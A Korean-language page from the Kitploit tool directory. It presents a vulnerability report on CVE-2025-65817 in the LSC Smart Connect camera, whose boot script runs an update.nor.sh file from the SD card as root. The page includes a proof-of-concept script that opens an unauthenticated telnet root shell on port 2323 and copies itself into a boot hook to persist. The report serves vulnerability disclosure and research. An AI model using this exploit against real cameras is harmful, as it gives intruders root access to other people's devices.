Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-65817 — 여기 CVE-2025-65817이 있습니다 | Kitploit
도구/GitHubGitHub/istaarkk/cve-2025-65817
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationHardware & IoT SecurityRemote Access Tool
GitHubistaarkk/cve-2025-65817

CVE-2025-65817

여기 CVE-2025-65817이 있습니다

저장소 보기
928개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-65817


필드값
제목취약점 보고서: LSC Smart Connect Camera
날짜2024-02-15
설명SD 카드 업데이트 훅을 악용하여 LSC Smart Connect 카메라에서 원격 셸을 생성.
태그iot, 취약점, cve
펌웨어1.14.13

LSC Smart Connect Camera 취약점 보고서

발견된 취약점은 start_app.sh의 업데이트 시스템, 특히 SD 카드 마운트와 update.nor.sh 파일을 이용하는 것입니다.

구성 변수

root@kitploit:~
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"

local/sbin/start_app.sh:50–99 부분은 SD 카드에 있는 update.nor.sh 라는 이름의 파일을 무조건 신뢰합니다. 부팅 과정에서 스크립트는:

  • SD 카드를 마운트하고,
  • update.nor.sh를 /tmp/update.nor.sh로 복사하며,
  • 내용, 무결성, 권한, 소유권에 대한 검증을 전혀 수행하지 않습니다.

나중에 시작 시퀀스(local/sbin/start_app.sh:108–129)에서 복사된 파일은:

  • 실행 가능으로 표시되고,
  • root로 실행되며,
  • SD 카드의 마운트 지점을 인수로 전달받아 실행됩니다.

이 실행은 메인 ipc_service가 시작되기 전에 발생하므로, 스크립트는 네트워킹 유틸리티, 워치독 함수, 업그레이드 헬퍼가 이미 사용 가능한 최고 권한 환경에서 실행됩니다.

사용 가능한 유틸리티

익스플로잇은 셸을 생성하고 카메라에 있는 telnetd를 통해 포트를 여는 방식입니다:

root@kitploit:~
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]

개념 증명

SD 카드에 .sh 스크립트를 작성하고 update.nor.sh로 이름을 지정하기만 하면 됩니다.

제가 선택한 익스플로잇은:

root@kitploit:~
#!/bin/sh

telnetd -l /bin/sh -p 2323 &

echo "Telnet start by update.nor.sh" > /tmp/exploit_success

cp /mnt/update.nor.sh /mnt/config/hook-boot.sh

date > /tmp/exploit_time

포트가 열린 것을 확인합니다.

alt text

telnet으로 연결합니다:

alt text

도구 다운로드